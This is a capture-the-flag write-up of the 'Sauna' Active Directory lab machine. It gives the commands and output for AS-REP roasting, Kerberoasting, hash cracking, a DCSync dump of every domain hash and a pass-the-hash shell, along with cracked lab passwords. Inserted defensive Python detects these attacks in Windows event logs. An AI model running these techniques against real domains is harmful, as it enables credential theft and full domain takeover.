Machine Info

Spoiler
Sauna is an easy difficulty Windows machine that features Active Directory enumeration and exploitation. Possible usernames can be derived from employee full names listed on the website. With these usernames, an ASREPRoasting attack can be performed, which results in a hash for an account that doesn't require Kerberos pre-authentication. This hash can be subjected to an offline brute force attack in order to recover the plaintext password for a user that is able to WinRM to the box. Running WinPEAS reveals that another system user has been configured to automatically log in, and it identifies their password. This second user also has Windows remote management permissions. BloodHound reveals that this user has the DS-Replication-Get-Changes-All extended right, which allows them to dump password hashes from the Domain Controller in a DCSync attack. Executing this attack returns the hash of the primary domain administrator, which can be used with Impacket's psexec.py in order to gain a shell on the box as NT_AUTHORITY\SYSTEM.

User

Reconnaissance

We are going to start by running our nmap scan:

└─$ ports=$(nmap -p- --min-rate=1000 -T4 10.129.95.180 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

└─$ nmap -p$ports -sC -sV 10.129.95.180 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-17 16:18 CET
Nmap scan report for 10.129.95.180
Host is up (0.068s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-17 22:18:49Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m00s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-01-17T22:19:41
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.51 seconds

We add the domain (EGOTISTICAL-BANK.LOCAL) and the hostname (SAUNA.EGOTISTICAL-BANK.LOCAL) to the /etc/hosts file.

Continuing with web enumeration we don't find much, but one page lists what appear to be the names of the internal team.

└─$ gobuster dir -u http://sauna.egotistical-bank.local -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 50 -x html,bak,txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://sauna.egotistical-bank.local
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              html,bak,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/About.html           (Status: 200) [Size: 30954]
/Blog.html            (Status: 200) [Size: 24695]
/Contact.html         (Status: 200) [Size: 15634]
/Images               (Status: 301) [Size: 167] [--> http://sauna.egotistical-bank.local/Images/]
/Index.html           (Status: 200) [Size: 32797]
/about.html           (Status: 200) [Size: 30954]
/blog.html            (Status: 200) [Size: 24695]
/contact.html         (Status: 200) [Size: 15634]
/css                  (Status: 301) [Size: 164] [--> http://sauna.egotistical-bank.local/css/]
/fonts                (Status: 301) [Size: 166] [--> http://sauna.egotistical-bank.local/fonts/]
/images               (Status: 301) [Size: 167] [--> http://sauna.egotistical-bank.local/images/]
/index.html           (Status: 200) [Size: 32797]
/single.html          (Status: 200) [Size: 38059]
Progress: 81924 / 81924 (100.00%)
===============================================================
Finished
===============================================================

Here are the names we get from about.html.

<div class="row">
    <div class="col-sm-4 service-1-w3pvt serve-gd3">
        <div class="serve-grid test-gd mt-4">
            <img src="images/t1.jpg" alt="" class="img-fluid image1">
            <p class="mt-2">Fergus Smith </p>
        </div>
        <div class="serve-grid test-gd mt-4">
            <img src="images/t2.jpg" alt="" class="img-fluid image1">
            <p class="mt-2">Hugo Bear </p>
        </div>
        <div class="serve-grid test-gd mt-4">
            <img src="images/t3.jpg" alt="" class="img-fluid image1">
            <p class="mt-2">Steven Kerb </p>
        </div>
    </div>

    <div class="col-sm-4 service-1-w3pvt serve-gd2">
        <div class="serve-grid test-gd mt-4">
            <img src="images/te2.jpg" alt="" class="img-fluid image1">
            <p class="mt-2">Shaun Coins </p>
        </div>
        <div class="serve-grid test-gd mt-4">
            <img src="images/te1.jpg" alt="" class="img-fluid image1">
            <p class="mt-2">Bowie Taylor </p>
        </div>
    </div>
    <div class="col-sm-4 service-1-w3pvt serve-gd1">
        <div class="serve-grid test-gd mt-4">
            <img src="images/t4.jpg" alt="" class="img-fluid image1">
            <p class="mt-2">Sophie Driver </p>
        </div>
    </div>

</div>

These could be internal AD users if we are lucky. Let's enumerate them with impacket-GetNPUsers, but first we generate the possible username formats with username-anarchy: we feed it the names found as one first and last name per line and it produces every common username permutation from them.

username-anarchy --input-file users.txt > users2.txt       
└─$ impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -usersfile users2.txt -dc-ip 10.129.95.180 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:87be45447465b32e0e7e0405b6b5472f$...
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

Bingo! We get the AS-REP hash for fsmith, the only generated username that exists in AD (and, as the hash shows, has pre-authentication disabled).

Let’s crack it.

└─$ hashcat -m 18200 fsmith.hash /usr/share/wordlists/rockyou.txt.gz 
...
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
....
FSmith's Cracked hash
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:87be45447465b32e0e7e0405b6b5472f$...:Thestrokes23

Using evil-winrm we get a shell and the user.txt.


Root

Post-Enumeration

To enumerate our position in the domain we use BloodHound. First we collect the data from our attacking machine with bloodhound-python.

└─$ bloodhound-python -d egotistical-bank.local -u fsmith -p '<PASSWORD>' -dc SAUNA.EGOTISTICAL-BANK.LOCAL -ns 10.129.95.180 -c all
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
WARNING: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
WARNING: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL
WARNING: Failed to get service ticket for SAUNA.EGOTISTICAL-BANK.LOCAL, falling back to NTLM auth
CRITICAL: CCache file is not found. Skipping...
WARNING: DCE/RPC connection failed: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Done in 00M 13S

Looking at the users we see another account named hsmith. It has an SPN set, so it is Kerberoastable and we can request its service ticket and crack it offline. faketime compensates for the 7h clock skew nmap reported, which otherwise makes the KDC reject our requests (the KRB_AP_ERR_SKEW error seen in the BloodHound collection above).

└─$ faketime 'Mon Jan 19 06:43:00 2026' impacket-GetUserSPNs EGOTISTICAL-BANK.LOCAL/fsmith -dc-ip 10.129.95.180 -request -outputfile kerberoast.hashes
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
ServicePrincipalName                      Name    MemberOf  PasswordLastSet             LastLogon  Delegation 
----------------------------------------  ------  --------  --------------------------  ---------  ----------
SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111  HSmith            2020-01-23 06:54:34.140321  <never>               
└─$ hashcat -m 13100  kerberoast.hashes /usr/share/wordlists/rockyou.txt.gz 
hashcat (v7.1.2) starting

...
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
...
HSmith's password
Thestrokes23
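The two ticket requests above (AS-REP for fsmith, TGS for HSmith's SPN) leave a recognisable trace on the Domain Controller. As an added example that is not part of the writeup, the following detection logic flags both patterns over constructed sample 4768/4769 events: a TGT issued with pre-authentication type 0, and an RC4 (etype 0x17) service ticket for a user-owned SPN. The IPs and event dicts are constructed; field names follow the Windows security event XML.

```python
# Added example (not from the writeup): flag AS-REP roasting and Kerberoasting
# candidates in Domain Controller security events. Event 4768 (TGT request) with
# PreAuthType 0 means no pre-authentication was done; ticket encryption type
# 0x17 (RC4-HMAC) is what produces the etype-23 hashes cracked above (hashcat
# modes 18200 and 13100). All records below are constructed sample data.
from collections import Counter

RC4_HMAC = "0x17"

SAMPLE_EVENTS = [  # constructed; keys mirror the event XML data fields
    {"EventID": 4768, "TargetUserName": "fsmith", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"EventID": 4768, "TargetUserName": "hsmith", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.20"},
    {"EventID": 4769, "TargetUserName": "fsmith@EGOTISTICAL-BANK.LOCAL",
     "ServiceName": "HSmith", "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"EventID": 4769, "TargetUserName": "fsmith@EGOTISTICAL-BANK.LOCAL",
     "ServiceName": "SAUNA$", "TicketEncryptionType": "0x12", "IpAddress": "10.10.14.5"},
    {"EventID": 4769, "TargetUserName": "svc_loanmgr@EGOTISTICAL-BANK.LOCAL",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
]

def classify(event):
    """Return a finding label for one event, or None if it looks benign."""
    eid = event.get("EventID")
    etype = event.get("TicketEncryptionType")
    if eid == 4768 and event.get("PreAuthType") == "0":
        # The KDC answered a TGT request without pre-auth: AS-REP roastable.
        # With RC4 the returned blob is cheap to crack offline.
        return "asrep-roast" + ("-rc4" if etype == RC4_HMAC else "")
    if eid == 4769 and etype == RC4_HMAC:
        svc = event.get("ServiceName", "")
        # Machine accounts and krbtgt have random keys; RC4 TGS requests for
        # user-owned SPNs are the Kerberoasting pattern GetUserSPNs produces.
        if not svc.endswith("$") and svc.lower() != "krbtgt":
            return "kerberoast-rc4"
    return None

def findings(events):
    """Map each flagged event to (label, requester IP, roasted account)."""
    out = []
    for ev in events:
        label = classify(ev)
        if label:
            who = ev.get("ServiceName") or ev.get("TargetUserName")
            out.append((label, ev["IpAddress"], who))
    return out

def requesters_by_ip(events):
    """Count flagged events per source IP; one host pulling many is the tell."""
    return Counter(ip for _, ip, _ in findings(events))
```

Mitigation follows from the same fields: clear DONT_REQ_PREAUTH on fsmith and move SPN accounts to AES-only keys with long random passwords (or gMSA), which removes the RC4 hashes this page cracks in seconds.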

DCSync

This, however, gives us no path to privilege escalation. Looking at the BloodHound output we also see a service account with some interesting outbound object control!

These two ACLs can be used to perform a DCSync attack, which makes this account our target for privilege escalation.
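A DCSync performed with these rights is logged on the Domain Controller as event 4662 with a control-access mask and the replication right GUIDs in the Properties field. As an added example that is not part of the writeup, the code below raises an alert for any such request from a principal that is not an allowed replicator; the GUIDs are the documented AD schema values for the three replication extended rights, the allowed set and the events are constructed assumptions.

```python
# Added example (not from the writeup): detect DCSync in DC security logs.
# Pulling secrets over DRSUAPI, as secretsdump does, is logged as event 4662
# with AccessMask 0x100 (control access) and the replication rights held by
# svc_loanmgr here, DS-Replication-Get-Changes / -Get-Changes-All, listed by
# GUID in the Properties field. GUIDs are the documented schema values.
import re

REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcf2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcf2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Principals expected to replicate: domain controllers, plus anything you have
# deliberately granted the rights (e.g. an identity sync service account).
ALLOWED_REPLICATORS = {"SAUNA$"}  # assumption for this sample

SAMPLE_4662 = [  # constructed sample events; keys mirror the event XML fields
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcf2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcf2}"},
    {"EventID": 4662, "SubjectUserName": "SAUNA$", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcf2}"},
    {"EventID": 4662, "SubjectUserName": "fsmith", "AccessMask": "0x20",
     "Properties": "%%7685 {bf967a86-0de6-11d0-a285-00aa003049e2}"},
]

def replication_rights(properties):
    """Return the replication right names referenced in a 4662 Properties field."""
    found = {g.lower() for g in GUID_RE.findall(properties)}
    return sorted(REPL_RIGHTS[g] for g in found if g in REPL_RIGHTS)

def dcsync_alerts(events, allowed=ALLOWED_REPLICATORS):
    """(user, rights) for every control-access replication request from a non-DC."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662 or ev.get("AccessMask") != "0x100":
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if rights and ev.get("SubjectUserName") not in allowed:
            alerts.append((ev["SubjectUserName"], rights))
    return alerts
```

The same GUIDs can be used proactively: auditing the domain object's DACL for these extended rights on anything other than DCs finds accounts like this one before they are abused.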

As a next step let's run winPEAS and see whether it finds anything.

*Evil-WinRM* PS C:\Users\FSmith\Documents> .\winPEASx64.exe

Looking at the output we find AutoLogon credentials for that account.

Autologin credentials
╔══════════╣ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!

Now our attack path is clear: we perform a DCSync attack with this account and obtain the Administrator's hash.

Administrator NT Hash
└─$ impacket-secretsdump EGOTISTICAL-BANK/svc_loanmgr@10.129.95.180
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:47ffe5972eb49901e0cbe6f8c1627664:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:0c3a42221337aa834b85e08e443be85f2bad531875eabb3a15766f02b6b8fb24
SAUNA$:aes128-cts-hmac-sha1-96:5b5006ca3579bbe190fb7810ba32a4de
SAUNA$:des-cbc-md5:54f1c785efc8e989
[*] Cleaning up... 
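The dump above also tells a defender something: HSmith and FSmith show the same NT hash, i.e. the same password (both cracked to Thestrokes23). As an added example that is not part of the writeup, the following audits a secretsdump-style NTDS dump for password reuse, empty passwords and LM hash storage; the input is a constructed sample with made-up hashes, only the two well-known empty-hash constants are real.

```python
# Added example (not from the writeup): audit a secretsdump-style NTDS dump
# (domain\user:rid:lmhash:nthash:::) the way a defender would after a breach.
# Identical NT hashes mean identical passwords (HSmith/FSmith above share one),
# the well-known empty-password NT hash flags accounts with no password, and any
# LM hash other than the empty one means LM storage is still enabled.
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # real constant: LM of empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # real constant: NT of empty password

SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CORP.LOCAL\\alice:1103:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
CORP.LOCAL\\bob:1105:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
CORP.LOCAL\\legacy:1110:0011223344556677aabbccddeeff0011:89abcdef0123456789abcdef01234567:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:00000000000000000000000000000000
"""  # constructed sample; hashes other than the empty-password constants are fake

def parse_dump(text):
    """Return (account, rid, lmhash, nthash) per hash line; skip status and key lines."""
    rows = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # "[*] ..." banners and aes/des key lines have no numeric RID
        account = parts[0].split("\\")[-1]  # drop the DOMAIN\ prefix
        rows.append((account, int(parts[1]), parts[2].lower(), parts[3].lower()))
    return rows

def audit(text):
    """Group accounts by NT hash and report reuse, empty passwords and LM storage."""
    rows = parse_dump(text)
    by_nt = defaultdict(list)
    for account, _, _, nt in rows:
        by_nt[nt].append(account)
    return {
        "reused": {nt: users for nt, users in by_nt.items()
                   if len(users) > 1 and nt != EMPTY_NT},
        "empty_password": [a for a, _, _, nt in rows if nt == EMPTY_NT],
        "lm_stored": [a for a, _, lm, _ in rows if lm != EMPTY_LM],
    }
```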

To get root.txt we authenticate as Administrator over WinRM by passing the hash.

evil-winrm -i 10.129.95.210 -u Administrator -H <HASH>